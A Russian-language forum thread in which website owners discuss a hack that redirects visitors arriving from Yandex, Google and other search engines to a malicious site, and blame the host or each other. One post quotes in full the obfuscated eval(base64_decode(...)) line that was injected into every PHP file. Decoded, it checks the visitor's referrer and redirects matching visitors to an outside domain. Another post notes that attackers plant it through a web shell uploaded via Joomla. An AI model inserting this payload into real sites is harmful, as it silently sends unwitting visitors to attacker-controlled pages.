Редирект на вредоносный сайт, с яндекса и гугла

да уже решили проблему.

http://www.bing.com/search?q=ip%3a194.135.22.142&first=1&FORM=PERE

проверяйте любой сайт

http://www.bertal.ru/index.php?url=http%3A%2F%2Fwww.ddm-stroy.ru%2Fprise%2Fprise1.htm&ar=400873#h

ТС сразу обратился в саппорт хостинг-компании. Написали глупую отмазку.

И, как видим, хостеру до сих пор по фиг.

Что печально, на серваке много сайтов, и другие пользователи не в курсе происходящего.

Он прав он же мне и помог, найти эту проблему через аську... Написал в тех поддержку на хостинг вчера вечером, до сих пор не решено, звонил им только что сказали что ищут решение...

Еще раз спасибо MFL за помощь..

У меня тоже была похожая ситуация.

Сайт сам написан на Joomla!

Все ПХП-шники были заражены:

В начале каждого ПХП-файла ставилсь строчка:
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vYnJ1Z2dlLm9zYS5wbC8iKTsNCmV4aXQoKTsNCn0NCn0NCn0NCn0="));

И что интересно - данная строчка вставлялась после каждого открывающего пхп-шного тега

Не совсем это похожая ситуация.

Кстати, такой вирус пишут через шелл, который заливают через джумлу. Очень часто сам шелл лежит в /modules/mod_myblog_archive/ - такого модуля не существует, удаляйте его если есть.

Но также шелл может быть и в других местах.

а ты проверь :)

я проверил

не знаю что проверять, но header(Location) сам по себе является серверным редиректом.

Простите, а какое хостеру дело до ваших дырявых скриптов? :) Вы несете ответственность за размещение скриптов и последствия этого размещения, а не хостер. Устранять последствия должен вебмастер сайта, а не техподдержка. Если вебмастер настолько некомпетентен, что не может найти по логам доступа (возможность ведения которых предоставляет любой хостер), как его скрипты поломали - наймите нормального вебмастера.

Вероятность того, что взломали хостера, а не ваши скрипты, стремится к нулю. Бритва Оккама.

Уважаемый троль, мне как и всем нет никакого дела до ваших комментариев, если вы не разобрались в вопросе и пытаетесь со своими советами куда то залезть то вам цитата: "Молчание золото"..

Вкратце вводная, мы удалили с ФТП абсолютно все папки.. ВСЕ!! редирект остался.. мы проверили сколько сайтов откликается по этому IP, потом проверили на всех редирект.. Отправили заявку на хостинг они признали (в конечном счете свой просак) извинились и всё исправили...

P.S. Читайте внимательнее.